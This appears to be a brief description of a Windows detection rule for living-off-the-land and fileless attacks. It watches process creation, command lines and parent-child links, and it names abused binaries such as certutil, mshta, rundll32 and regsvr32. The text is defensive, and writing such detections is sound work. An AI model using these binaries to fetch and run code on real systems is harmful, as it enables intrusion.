Detects abuse of legitimate Windows binaries by tracking process creation, command-line parameters, and parent-child relationships to flag living-off-the-land and fileless attack patterns.
Monitor for suspicious use of legitimate Windows binaries (LOLBins)
including certutil, mshta, rundll32, regsvr32, and others used in
fileless and living-off-the-land attack techniques.
